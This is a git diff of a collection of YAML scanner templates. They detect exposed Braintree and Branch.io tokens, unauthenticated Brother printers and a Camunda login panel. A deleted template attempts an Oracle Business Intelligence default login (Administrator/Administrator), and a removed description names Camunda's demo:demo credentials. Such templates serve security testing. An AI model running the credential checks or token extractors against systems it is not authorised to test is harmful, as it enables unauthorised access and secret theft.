4b0a00483046022100b39c8aa2272e2a5ba6f3e17d7f238c776bef3fee2a72f2bc8ef488494fe1cfcf022100c48a4a0f4b3967dc4784f56642f0ebe9c67796acfd715ce60781b99f31556c69:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/braintree-access-token-771.yaml b/poc/auth/braintree-access-token-771.yaml new file mode 100644 index 0000000000..fc4e695c66 --- /dev/null +++ b/poc/auth/braintree-access-token-771.yaml @@ -0,0 +1,17 @@ +id: braintree-access-token + +info: + name: PayPal Braintree Access Token Disclosure + author: Ice3man + severity: info + tags: exposure,token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/poc/auth/braintree-access-token-773.yaml b/poc/auth/braintree-access-token.yaml similarity index 100% rename from poc/auth/braintree-access-token-773.yaml rename to poc/auth/braintree-access-token.yaml diff --git a/poc/auth/branch-key-774.yaml b/poc/auth/branch-key-774.yaml index 877dd31a45..1b63de346f 100644 --- a/poc/auth/branch-key-774.yaml +++ b/poc/auth/branch-key-774.yaml @@ -4,8 +4,7 @@ info: name: Branch.io Live Key author: 0xh7ml severity: info - reference: - - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 tags: token,file file: diff --git a/poc/auth/brother-unauthorized-access.yaml b/poc/auth/brother-unauthorized-access.yaml index 3e9b12151b..f3e5d8283c 100644 --- a/poc/auth/brother-unauthorized-access.yaml +++ b/poc/auth/brother-unauthorized-access.yaml @@ -1,12 +1,12 @@ id: brother-unauthorized-access - + info: name: Brother Printer author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6889 tags: iot,printer,unauth - + requests: - method: GET path: diff --git a/poc/auth/businessintelligence-default-login.yaml b/poc/auth/businessintelligence-default-login.yaml deleted file mode 100644 index a89df1808c..0000000000 --- a/poc/auth/businessintelligence-default-login.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: oracle-business-intelligence-login - -info: - name: Oracle Business Intelligence Default Login - author: milo2012 - severity: high - tags: oracle,default-login - -requests: - - raw: - - | - POST /xmlpserver/services/XMLPService HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - SOAPAction: "" - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - - - - - - {{username}} - {{password}} - bi - - - - - payloads: - username: - - Administrator - password: - - Administrator - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'createSessionReturn' - part: body diff --git a/poc/auth/camunda-login-panel.yaml b/poc/auth/camunda-login-panel.yaml index b4a6543207..195e594fc0 100644 --- a/poc/auth/camunda-login-panel.yaml +++ b/poc/auth/camunda-login-panel.yaml @@ -1,13 +1,21 @@ id: camunda-login-panel + info: - name: Camunda Login panel + name: Camunda Login Panel - Detect author: alifathi-h1 severity: info - description: Default Credentials of demo:demo on Camunda application. - reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + description: Camunda login panel was detected. + reference: + - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: camunda,panel,login -requests: +http: - method: GET path: - '{{BaseURL}}/app/welcome/default/#!/login' @@ -15,10 +23,10 @@ requests: matchers-condition: and matchers: - - type: word words: - "Camunda Welcome" + - type: status status: - 200 @@ -29,3 +37,5 @@ requests: group: 1 regex: - '